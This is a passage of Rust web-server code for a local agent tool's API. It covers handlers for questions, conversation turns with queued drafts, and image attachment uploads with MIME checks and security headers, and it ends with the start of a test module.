3342 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3343 if !q.status.open() {
3344 return Err(ApiError::conflict(format!(
3348 "question {} is already {}",
3349 q.short(),
3350 q.status.as_str()
3351 )));
3352 }
3353 q.answer(answer).map_err(ApiError::bad_request_from)?;
3357 ui.questions.put(&mut q)?;
3358 Ok(Json(QuestionView::from(q)))
3359 })
3360 .await
3361}
3362
3363#[derive(Debug, Deserialize)]
3365#[serde(deny_unknown_fields)]
3366struct NewSay {
3367 body: String,
3368}
3369
3370async fn question_say(
3380 State(ui): State<Arc<Ui>>,
3381 Path(id): Path<String>,
3382 body: std::result::Result<Json<NewSay>, JsonRejection>,
3383) -> ApiResult<Json<QuestionView>> {
3384 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3385 blocking(move || {
3386 let id = resolve_question(&ui.questions, &id)?;
3387 let mut q = ui
3388 .questions
3389 .get(&id)
3390 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3391 if !q.status.open() {
3392 return Err(ApiError::conflict(format!(
3396 "question {} is already {}",
3397 q.short(),
3398 q.status.as_str()
3399 )));
3400 }
3401 q.say(body.body).map_err(ApiError::bad_request_from)?;
3404 ui.questions.put(&mut q)?;
3405 Ok(Json(QuestionView::from(q)))
3406 })
3407 .await
3408}
3409
3410fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3412 if store.path_of(id).is_file() {
3413 return Ok(id.to_owned());
3414 }
3415 pick(
3416 store.list().into_iter().map(|q| q.id).collect(),
3417 id,
3418 "question",
3419 )
3420}
3421
3422async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3437 blocking(move || {
3438 let id = resolve_question(&ui.questions, &id)?;
3439 let Some(html) = ui.questions.panel_html(&id) else {
3440 return Err(ApiError::not_found(format!("question {id} has no panel")));
3441 };
3442 Ok(panel_response(
3443 "text/html; charset=utf-8",
3444 false,
3445 html.into_bytes(),
3446 ))
3447 })
3448 .await
3449}
3450
3451async fn question_asset(
3479 State(ui): State<Arc<Ui>>,
3480 Path((id, name)): Path<(String, String)>,
3481) -> ApiResult<Response> {
3482 if !crate::ask::valid_asset_name(&name) {
3485 return Err(ApiError::bad_request(format!(
3486 "`{name}` is not a usable asset name"
3487 )));
3488 }
3489 blocking(move || {
3490 let id = resolve_question(&ui.questions, &id)?;
3491 let asset = ui
3492 .questions
3493 .panel_asset(&id, &name)
3494 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3495 let Some(bytes) = asset else {
3496 return Err(ApiError::not_found(format!(
3497 "question {id} has no asset `{name}`"
3498 )));
3499 };
3500 Ok(panel_response(
3501 asset_content_type(&name),
3502 is_svg(&name),
3503 bytes,
3504 ))
3505 })
3506 .await
3507}
3508
3509fn asset_content_type(name: &str) -> &'static str {
3522 match extension(name).as_deref() {
3523 Some("png") => "image/png",
3524 Some("jpg" | "jpeg") => "image/jpeg",
3525 Some("gif") => "image/gif",
3526 Some("webp") => "image/webp",
3527 Some("svg") => "image/svg+xml",
3528 Some("css") => "text/css; charset=utf-8",
3529 Some("txt") => "text/plain; charset=utf-8",
3530 _ => "application/octet-stream",
3531 }
3532}
3533
3534fn is_svg(name: &str) -> bool {
3537 extension(name).as_deref() == Some("svg")
3538}
3539
3540fn extension(name: &str) -> Option<String> {
3542 name.rsplit_once('.')
3543 .map(|(_, ext)| ext.to_ascii_lowercase())
3544}
3545
3546fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3563 let mut res = (
3564 [
3565 (header::CONTENT_TYPE, content_type),
3566 (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3567 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3568 (header::REFERRER_POLICY, "no-referrer"),
3569 ],
3570 body,
3571 )
3572 .into_response();
3573 if download {
3574 res.headers_mut().insert(
3575 header::CONTENT_DISPOSITION,
3576 HeaderValue::from_static("attachment"),
3577 );
3578 }
3579 res
3580}
3581
3582#[derive(Debug, Serialize)]
3588struct TalkView {
3589 #[serde(flatten)]
3590 talk: Talk,
3591 turn_bodies_md: Vec<Vec<md::Node>>,
3592 thinking: bool,
3600}
3601
3602impl TalkView {
3603 fn new(talk: Talk, thinking: bool) -> Self {
3604 let turn_bodies_md = talk
3605 .turns
3606 .iter()
3607 .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3608 .collect();
3609 Self {
3610 turn_bodies_md,
3611 thinking,
3612 talk,
3613 }
3614 }
3615}
3616
3617#[derive(Debug, Serialize)]
3622struct TalkDetailView {
3623 #[serde(flatten)]
3624 view: TalkView,
3625 tasks: Vec<TaskView>,
3626}
3627
3628async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3633 blocking(move || {
3634 Ok(Json(
3635 ui.talks
3636 .list()
3637 .into_iter()
3638 .map(|talk| {
3639 let thinking = ui.is_thinking(&talk.id);
3640 TalkView::new(talk, thinking)
3641 })
3642 .collect(),
3643 ))
3644 })
3645 .await
3646}
3647
3648#[derive(Debug, Default, Deserialize)]
3653#[serde(default)]
3654struct NewTalk {
3655 agent: Option<String>,
3656 repo: Option<PathBuf>,
3657}
3658
3659async fn talk_post(
3662 State(ui): State<Arc<Ui>>,
3663 body: std::result::Result<Json<NewTalk>, JsonRejection>,
3664) -> ApiResult<impl IntoResponse> {
3665 let body = match body {
3669 Ok(Json(body)) => body,
3670 Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3671 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3672 };
3673 let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3674 let cfg = config_for(&repo).await?;
3675 let view = blocking(move || {
3676 let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3677 let thinking = ui.is_thinking(&talk.id);
3678 Ok(TalkView::new(talk, thinking))
3679 })
3680 .await?;
3681 Ok((StatusCode::CREATED, Json(view)))
3682}
3683
3684async fn talk_detail(
3686 State(ui): State<Arc<Ui>>,
3687 Path(id): Path<String>,
3688) -> ApiResult<Json<TalkDetailView>> {
3689 blocking(move || {
3690 let id = resolve_talk(&ui.talks, &id)?;
3691 let talk = ui.talks.get(&id)?;
3692 let thinking = ui.is_thinking(&talk.id);
3693 let tasks = talk::tasks_of(&ui.queue, &talk.id)
3694 .into_iter()
3695 .map(TaskView::from)
3696 .collect();
3697 Ok(Json(TalkDetailView {
3698 view: TalkView::new(talk, thinking),
3699 tasks,
3700 }))
3701 })
3702 .await
3703}
3704
3705#[derive(Debug, Default, Deserialize)]
3711#[serde(default, deny_unknown_fields)]
3712struct NewTalkTurn {
3713 text: String,
3714 attachments: Vec<String>,
3715}
3716
3717#[derive(Debug, Deserialize)]
3718#[serde(deny_unknown_fields)]
3719struct EditTalkPending {
3720 text: String,
3721 expected_text: String,
3722 expected_attachments: Vec<String>,
3723}
3724
3725#[derive(Debug, Deserialize)]
3726#[serde(deny_unknown_fields)]
3727struct ClearTalkPending {
3728 expected_text: String,
3729 expected_attachments: Vec<String>,
3730}
3731
3732async fn talk_say(
3744 State(ui): State<Arc<Ui>>,
3745 Path(id): Path<String>,
3746 body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
3747) -> ApiResult<(StatusCode, Json<TalkView>)> {
3748 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3749 if body.text.trim().is_empty() && body.attachments.is_empty() {
3750 return Err(ApiError::bad_request("say something"));
3751 }
3752
3753 let id = {
3754 let ui = Arc::clone(&ui);
3755 let asked = id.clone();
3756 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3757 };
3758 {
3762 let ui = Arc::clone(&ui);
3763 let id = id.clone();
3764 blocking(move || {
3765 let talk = ui.talks.get(&id)?;
3766 if !talk.status.open() {
3767 return Err(ApiError::conflict(format!(
3768 "talk {} is {} and takes no more turns",
3769 talk.short(),
3770 talk.status.as_str()
3771 )));
3772 }
3773 Ok(())
3774 })
3775 .await?;
3776 }
3777
3778 let attachments = {
3783 let ui = Arc::clone(&ui);
3784 let id = id.clone();
3785 let ids = body.attachments.clone();
3786 blocking(move || {
3787 ids.into_iter()
3788 .map(|att_id| {
3789 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
3790 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
3791 })
3792 })
3793 .collect::<ApiResult<Vec<talk::Attachment>>>()
3794 })
3795 .await?
3796 };
3797
3798 let start = {
3803 let ui = Arc::clone(&ui);
3804 let id = id.clone();
3805 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
3806 };
3807 let turn_guard = match start {
3808 TalkTurnStart::Claimed(turn_guard) => turn_guard,
3809 TalkTurnStart::Pending => {
3810 return Err(ApiError::conflict(
3811 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
3812 ));
3813 }
3814 TalkTurnStart::Busy => {
3815 let (tx, rx) = tokio::sync::oneshot::channel();
3831 tokio::spawn({
3832 let ui = Arc::clone(&ui);
3833 let id = id.clone();
3834 let said = body.text.clone();
3835 async move {
3836 let written = blocking({
3837 let ui = Arc::clone(&ui);
3838 let id = id.clone();
3839 move || {
3840 let mut talk = ui.talks.get(&id)?;
3841 #[cfg(test)]
3846 if let Some(gate) = ui
3847 .busy_queue_gate
3848 .lock()
3849 .unwrap_or_else(PoisonError::into_inner)
3850 .take()
3851 {
3852 let _ = gate.reached.send(());
3853 let _ = gate.release.recv();
3854 }
3855 if let Err(error) =
3856 talk::queue(&mut talk, &ui.talks, &said, attachments)
3857 {
3858 if let Ok(fresh) = ui.talks.get(&id) {
3859 if !fresh.status.open() {
3860 return Err(ApiError::conflict(format!(
3861 "talk {} is {} and takes no more turns",
3862 fresh.short(),
3863 fresh.status.as_str()
3864 )));
3865 }
3866 }
3867 return Err(ApiError::from(error));
3868 }
3869 let claim = match ui.begin_queued_talk_turn(&id)? {
3880 Some(turn_guard) => {
3881 let (cfg, _) = Config::discover(&talk.repo, None)?;
3882 Some((talk.clone(), cfg, turn_guard))
3883 }
3884 None => None,
3885 };
3886 let thinking = ui.is_thinking(&id);
3887 Ok((TalkView::new(talk, thinking), claim))
3888 }
3889 })
3890 .await;
3891 let (view, reclaimed) = match written {
3892 Ok(pair) => pair,
3893 Err(e) => {
3894 let _ = tx.send(Err(e));
3899 return;
3900 }
3901 };
3902 let _ = tx.send(Ok(view));
3905 if let Some((talk, cfg, turn_guard)) = reclaimed {
3906 let talks = ui.talks.clone();
3907 drain_loop(talk, talks, cfg, id, turn_guard).await;
3908 }
3909 }
3910 });
3911 let view = rx
3912 .await
3913 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3914 return Ok((StatusCode::ACCEPTED, Json(view)));
3915 }
3916 };
3917
3918 let (talk, cfg) = {
3919 let ui = Arc::clone(&ui);
3920 let id = id.clone();
3921 blocking(move || {
3922 let talk = ui.talks.get(&id)?;
3923 let (cfg, _) = Config::discover(&talk.repo, None)?;
3924 Ok((talk, cfg))
3925 })
3926 .await?
3927 };
3928
3929 let talks = ui.talks.clone();
3930 let (tx, rx) = tokio::sync::oneshot::channel();
3945 tokio::spawn({
3946 let ui = Arc::clone(&ui);
3947 let talks = talks.clone();
3948 let id = id.clone();
3949 let said = body.text.clone();
3950 let mut talk = talk.clone();
3951 async move {
3952 let recorded = blocking({
3953 let talks = talks.clone();
3954 move || {
3955 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
3956 if let Ok(fresh) = talks.get(&talk.id) {
3957 if !fresh.status.open() {
3958 return Err(ApiError::conflict(format!(
3959 "talk {} is {} and takes no more turns",
3960 fresh.short(),
3961 fresh.status.as_str()
3962 )));
3963 }
3964 }
3965 return Err(ApiError::from(error));
3966 }
3967 Ok((said.trim().to_owned(), talk))
3973 }
3974 })
3975 .await;
3976 let (text, mut talk) = match recorded {
3977 Ok(pair) => pair,
3978 Err(e) => {
3979 let _ = tx.send(Err(e));
3983 return;
3984 }
3985 };
3986 let queued = talk.clone();
3987 let thinking = ui.is_thinking(&id);
3988 let _ = tx.send(Ok((queued, thinking)));
3991
3992 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
3993 tracing::warn!("talk {id} turn failed: {e:#}");
3997 }
3998 drain_loop(talk, talks, cfg, id, turn_guard).await;
4001 }
4002 });
4003
4004 let (queued, thinking) = rx
4005 .await
4006 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
4007
4008 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
4010}
4011
4012async fn talk_pending_resume(
4016 State(ui): State<Arc<Ui>>,
4017 Path(id): Path<String>,
4018) -> ApiResult<(StatusCode, Json<TalkView>)> {
4019 let id = {
4020 let ui = Arc::clone(&ui);
4021 let asked = id.clone();
4022 blocking(move || resolve_talk(&ui.talks, &asked)).await?
4023 };
4024 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
4025 return Err(ApiError::conflict(
4026 "a talk turn is already running; the queued draft will be handled by it",
4027 ));
4028 };
4029 let (talk, cfg) = {
4030 let ui = Arc::clone(&ui);
4031 let id = id.clone();
4032 blocking(move || {
4033 let talk = ui.talks.get(&id)?;
4034 if !talk.status.open() {
4035 return Err(ApiError::conflict(format!(
4036 "talk {} is {} and takes no more turns",
4037 talk.short(),
4038 talk.status.as_str()
4039 )));
4040 }
4041 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
4042 return Err(ApiError::conflict("there is no queued draft to resume"));
4043 }
4044 let (cfg, _) = Config::discover(&talk.repo, None)?;
4045 Ok((talk, cfg))
4046 })
4047 .await?
4048 };
4049 let view = TalkView::new(talk.clone(), true);
4050 let talks = ui.talks.clone();
4051 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4052 Ok((StatusCode::ACCEPTED, Json(view)))
4053}
4054
4055async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
4071 let live_set = Arc::clone(&turn.turns);
4072 let mut turn = Some(turn);
4080 loop {
4081 let observed = live_set
4085 .lock()
4086 .unwrap_or_else(PoisonError::into_inner)
4087 .queued
4088 .get(&id)
4089 .copied()
4090 .unwrap_or(0);
4091 let drained = blocking({
4092 let talks = talks.clone();
4093 move || {
4094 let result = talk::drain(&mut talk, &talks);
4095 Ok((talk, result))
4096 }
4097 })
4098 .await;
4099 let (next_talk, result) = match drained {
4100 Ok(drained) => drained,
4101 Err(e) => {
4102 tracing::warn!(
4103 status = %e.status,
4104 message = %e.message,
4105 "talk {id} could not start queued-text drain"
4106 );
4107 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4108 turn.take()
4109 .expect("held for the whole loop until released here")
4110 .release(&mut live);
4111 break;
4112 }
4113 };
4114 talk = next_talk;
4115 let drained = match result {
4116 Ok(Some(drained)) => drained,
4117 Ok(None) => {
4118 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4119 if live.queued.get(&id).copied().unwrap_or(0) != observed {
4120 continue;
4121 }
4122 turn.take()
4123 .expect("held for the whole loop until released here")
4124 .release(&mut live);
4125 break;
4126 }
4127 Err(e) => {
4128 tracing::warn!("talk {id} could not drain queued text: {e:#}");
4129 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4130 turn.take()
4131 .expect("held for the whole loop until released here")
4132 .release(&mut live);
4133 break;
4134 }
4135 };
4136 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
4137 tracing::warn!("talk {id} turn failed: {e:#}");
4138 }
4139 }
4140}
4141
4142async fn talk_pending_clear(
4144 State(ui): State<Arc<Ui>>,
4145 Path(id): Path<String>,
4146 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
4147) -> ApiResult<Json<TalkView>> {
4148 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4149 blocking(move || {
4150 let id = resolve_talk(&ui.talks, &id)?;
4151 let mut talk = ui.talks.get(&id)?;
4152 if !talk.status.open() {
4153 return Err(ApiError::conflict(format!(
4154 "talk {} is {} and takes no more turns",
4155 talk.short(),
4156 talk.status.as_str()
4157 )));
4158 }
4159 if !talk::clear_pending_if_matches(
4160 &mut talk,
4161 &ui.talks,
4162 &body.expected_text,
4163 &body.expected_attachments,
4164 )? {
4165 return Err(ApiError::conflict(
4166 "queued message changed; reload it before clearing",
4167 ));
4168 }
4169 let thinking = ui.is_thinking(&talk.id);
4170 Ok(Json(TalkView::new(talk, thinking)))
4171 })
4172 .await
4173}
4174
4175async fn talk_pending_edit(
4179 State(ui): State<Arc<Ui>>,
4180 Path(id): Path<String>,
4181 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
4182) -> ApiResult<Json<TalkView>> {
4183 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4184 let (view, reclaimed) = blocking({
4185 let ui = Arc::clone(&ui);
4186 move || {
4187 let id = resolve_talk(&ui.talks, &id)?;
4188 let mut talk = ui.talks.get(&id)?;
4189 if !talk.status.open() {
4190 return Err(ApiError::conflict(format!(
4191 "talk {} is {} and takes no more turns",
4192 talk.short(),
4193 talk.status.as_str()
4194 )));
4195 }
4196 if !talk::edit_pending_text(
4197 &mut talk,
4198 &ui.talks,
4199 &body.text,
4200 &body.expected_text,
4201 &body.expected_attachments,
4202 )? {
4203 return Err(ApiError::conflict(
4204 "queued message changed; reload it before editing",
4205 ));
4206 }
4207 let claim = match ui.begin_queued_talk_turn(&id)? {
4208 Some(turn_guard) => {
4209 let (cfg, _) = Config::discover(&talk.repo, None)?;
4210 Some((talk.clone(), cfg, id.clone(), turn_guard))
4211 }
4212 None => None,
4213 };
4214 let thinking = ui.is_thinking(&id);
4215 Ok((TalkView::new(talk, thinking), claim))
4216 }
4217 })
4218 .await?;
4219 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4220 let talks = ui.talks.clone();
4221 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4222 }
4223 Ok(Json(view))
4224}
4225
4226async fn talk_close(
4228 State(ui): State<Arc<Ui>>,
4229 Path(id): Path<String>,
4230) -> ApiResult<Json<TalkView>> {
4231 blocking(move || {
4232 let id = resolve_talk(&ui.talks, &id)?;
4233 let mut talk = ui.talks.get(&id)?;
4234 talk::close(&mut talk, &ui.talks)?;
4235 let thinking = ui.is_thinking(&talk.id);
4236 Ok(Json(TalkView::new(talk, thinking)))
4237 })
4238 .await
4239}
4240
4241async fn talk_reopen(
4243 State(ui): State<Arc<Ui>>,
4244 Path(id): Path<String>,
4245) -> ApiResult<Json<TalkView>> {
4246 blocking(move || {
4247 let id = resolve_talk(&ui.talks, &id)?;
4248 let mut talk = ui.talks.get(&id)?;
4249 talk::reopen(&mut talk, &ui.talks)?;
4250 let thinking = ui.is_thinking(&talk.id);
4251 Ok(Json(TalkView::new(talk, thinking)))
4252 })
4253 .await
4254}
4255
4256async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4266 blocking(move || {
4267 let id = resolve_talk(&ui.talks, &id)?;
4268 ui.talks.remove(&id)?;
4269 Ok(StatusCode::NO_CONTENT)
4270 })
4271 .await
4272}
4273
4274fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4276 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4277}
4278
4279async fn talk_attachment_post(
4282 State(ui): State<Arc<Ui>>,
4283 Path(id): Path<String>,
4284 headers: HeaderMap,
4285 body: Bytes,
4286) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4287 let mime = validate_attachment(&headers, &body)?;
4288 let name = filename_header(&headers);
4289 let data = body.to_vec();
4290 blocking(move || {
4291 let id = resolve_talk(&ui.talks, &id)?;
4292 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4293 Ok((StatusCode::CREATED, Json(att)))
4294 })
4295 .await
4296}
4297
4298async fn talk_attachment_get(
4301 State(ui): State<Arc<Ui>>,
4302 Path((id, att)): Path<(String, String)>,
4303) -> ApiResult<Response> {
4304 blocking(move || {
4305 let id = resolve_talk(&ui.talks, &id)?;
4306 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4307 return Err(ApiError::not_found(format!(
4308 "talk {id} has no attachment `{att}`"
4309 )));
4310 };
4311 Ok(attachment_response(&meta.mime, data))
4312 })
4313 .await
4314}
4315
4316fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4327 if data.len() > ATTACHMENT_MAX_BYTES {
4328 return Err(ApiError::bad_request(format!(
4329 "attachment is {} bytes, over the {} MiB limit",
4330 data.len(),
4331 ATTACHMENT_MAX_BYTES / (1024 * 1024)
4332 ))
4333 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4334 }
4335 if data.is_empty() {
4336 return Err(ApiError::bad_request("attachment is empty"));
4337 }
4338 let declared = declared_mime(headers)?;
4339 match sniffed_mime(data) {
4340 Some(sniffed) if sniffed == declared => Ok(declared),
4341 Some(sniffed) => Err(ApiError::bad_request(format!(
4342 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4343 ))),
4344 None => Err(ApiError::bad_request(
4345 "the file's bytes do not match any accepted image format",
4346 )),
4347 }
4348}
4349
4350fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4354 let raw = headers
4355 .get(header::CONTENT_TYPE)
4356 .and_then(|v| v.to_str().ok())
4357 .unwrap_or("")
4358 .split(';')
4359 .next()
4360 .unwrap_or("")
4361 .trim()
4362 .to_ascii_lowercase();
4363 ATTACHMENT_MIME_WHITELIST
4364 .iter()
4365 .find(|&&m| m == raw)
4366 .copied()
4367 .ok_or_else(|| {
4368 if raw == "image/svg+xml" {
4369 ApiError::bad_request(
4370 "SVG is not accepted: it can carry active content (e.g. a <script>), \
4371 not just a picture",
4372 )
4373 } else if raw.is_empty() {
4374 ApiError::bad_request("Content-Type is required for an attachment upload")
4375 } else {
4376 ApiError::bad_request(format!(
4377 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4378 image/gif or image/webp"
4379 ))
4380 }
4381 })
4382}
4383
4384fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4387 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4388 Some("image/png")
4389 } else if data.starts_with(b"\xff\xd8\xff") {
4390 Some("image/jpeg")
4391 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4392 Some("image/gif")
4393 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4394 Some("image/webp")
4395 } else {
4396 None
4397 }
4398}
4399
4400fn filename_header(headers: &HeaderMap) -> String {
4406 headers
4407 .get(FILENAME_HEADER)
4408 .and_then(|v| v.to_str().ok())
4409 .map(str::trim)
4410 .filter(|s| !s.is_empty())
4411 .unwrap_or("attachment")
4412 .to_owned()
4413}
4414
4415fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4422 let content_type = ATTACHMENT_MIME_WHITELIST
4423 .iter()
4424 .find(|&&m| m == mime)
4425 .copied()
4426 .unwrap_or("application/octet-stream");
4427 (
4428 [
4429 (header::CONTENT_TYPE, content_type),
4430 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4431 ],
4432 body,
4433 )
4434 .into_response()
4435}
4436
4437async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4445 let repo = repo.to_path_buf();
4446 blocking(move || {
4447 let (cfg, _) = Config::discover(&repo, None)?;
4448 Ok(cfg)
4449 })
4450 .await
4451}
4452
4453fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4459 let mut hits = ids
4460 .into_iter()
4461 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4462 match (hits.next(), hits.next()) {
4463 (Some(one), None) => Ok(one),
4464 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4465 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4466 "`{prefix}` matches more than one {what}, including {a} and {b}"
4467 ))),
4468 }
4469}
4470
4471#[cfg(test)]
4472mod tests {
4473 use pretty_assertions::assert_eq;
4474 use serde_json::Value;
4475 use tempfile::TempDir;
4476 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4477
4478 use super::*;
4479 use crate::config::Config;
4480 use crate::queue::{Source, TaskStatus};
4481
4482 const SETTLE_STEPS: usize = 3_000;
4493
4494 struct Fixture {
4500 home: TempDir,
4501 addr: SocketAddr,
4502 }
4503
4504 impl Fixture {
4505 async fn start() -> Self {
4506 Self::with_loop(launch_idle).await
4507 }
4508
4509 async fn with_loop(launch: Launch) -> Self {
4511 let home = TempDir::new().expect("temp home");
4512 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4513 Self { home, addr }
4514 }
4515
4516 async fn with_repo(repo: PathBuf) -> Self {
4520 let home = TempDir::new().expect("temp home");
4521 let addr = Self::serve(home.path(), repo, launch_idle).await;
4522 Self { home, addr }
4523 }
4524
4525 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4526 let queue = Queue::at(home.join("queue"));
4527 let runs = home.join("runs");
4528 std::fs::create_dir_all(&runs).expect("runs dir");
4529 let worktrees = home.join("wt").join("magi");
4530 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4531 let ui = Ui::new(
4532 queue,
4533 Questions::at(home.join("questions")),
4534 Talks::at(home.join("talks")),
4535 runs,
4536 home.to_path_buf(),
4537 repo,
4538 )
4539 .with_worktrees_root(worktrees)
4540 .with_launch(launch);
4541 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4542 .await
4543 .expect("bind loopback");
4544 let addr = listener.local_addr().expect("local addr");
4545 tokio::spawn(async move {
4546 let _ = axum::serve(listener, ui.router()).await;
4547 });
4548 addr
4549 }
4550
4551 fn queue(&self) -> Queue {
4552 Queue::at(self.home.path().join("queue"))
4553 }
4554
4555 fn questions(&self) -> Questions {
4556 Questions::at(self.home.path().join("questions"))
4557 }
4558
4559 fn talks(&self) -> Talks {
4560 Talks::at(self.home.path().join("talks"))
4561 }
4562
4563 fn runs(&self) -> PathBuf {
4564 self.home.path().join("runs")
4565 }
4566
4567 async fn get(&self, path: &str) -> Res {
4568 request(self.addr, "GET", path, None).await
4569 }
4570
4571 async fn head(&self, path: &str) -> Res {
4576 request(self.addr, "HEAD", path, None).await
4577 }
4578
4579 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4580 request(self.addr, "POST", path, body).await
4581 }
4582
4583 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4584 request_with(self.addr, "GET", path, None, extra).await
4585 }
4586
4587 async fn delete(&self, path: &str) -> Res {
4588 request(self.addr, "DELETE", path, None).await
4589 }
4590
4591 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4593 request_bytes(self.addr, path, headers, body).await
4594 }
4595 }
4596
4597 struct Res {
4598 status: u16,
4599 headers: String,
4600 head: String,
4605 body: String,
4606 bytes: Vec<u8>,
4610 }
4611
4612 impl Res {
4613 fn json(&self) -> Value {
4614 serde_json::from_str(&self.body)
4615 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4616 }
4617
4618 fn header(&self, name: &str) -> Option<&str> {
4620 self.head.lines().find_map(|line| {
4621 let (key, value) = line.split_once(':')?;
4622 key.trim()
4623 .eq_ignore_ascii_case(name)
4624 .then(|| value.trim_start().trim_end_matches('\r'))
4625 })
4626 }
4627 }
4628
4629 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4632 request_with(addr, method, path, body, &[]).await
4633 }
4634
4635 async fn request_with(
4639 addr: SocketAddr,
4640 method: &str,
4641 path: &str,
4642 body: Option<&str>,
4643 extra: &[(&str, &str)],
4644 ) -> Res {
4645 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4646 for (name, value) in extra {
4647 head.push_str(&format!("{name}: {value}\r\n"));
4648 }
4649 if let Some(body) = body {
4650 head.push_str("Content-Type: application/json\r\n");
4651 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4652 }
4653 head.push_str("\r\n");
4654 if let Some(body) = body {
4655 head.push_str(body);
4656 }
4657 let mut socket = tokio::net::TcpStream::connect(addr)
4658 .await
4659 .expect("connect to the test server");
4660 socket
4661 .write_all(head.as_bytes())
4662 .await
4663 .expect("write request");
4664 let mut raw = Vec::new();
4665 socket.read_to_end(&mut raw).await.expect("read response");
4666 let split = raw
4669 .windows(4)
4670 .position(|w| w == b"\r\n\r\n")
4671 .expect("a header block");
4672 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4673 let bytes = raw[split + 4..].to_vec();
4674 let status = head
4675 .lines()
4676 .next()
4677 .and_then(|line| line.split_whitespace().nth(1))
4678 .and_then(|code| code.parse().ok())
4679 .expect("a status line");
4680 Res {
4681 status,
4682 headers: head.to_lowercase(),
4683 head,
4684 body: String::from_utf8_lossy(&bytes).into_owned(),
4685 bytes,
4686 }
4687 }
4688
4689 async fn request_bytes(
4695 addr: SocketAddr,
4696 path: &str,
4697 headers: &[(&str, &str)],
4698 body: &[u8],
4699 ) -> Res {
4700 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4701 for (name, value) in headers {
4702 head.push_str(&format!("{name}: {value}\r\n"));
4703 }
4704 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4705 let mut socket = tokio::net::TcpStream::connect(addr)
4706 .await
4707 .expect("connect to the test server");
4708 socket
4709 .write_all(head.as_bytes())
4710 .await
4711 .expect("write request head");
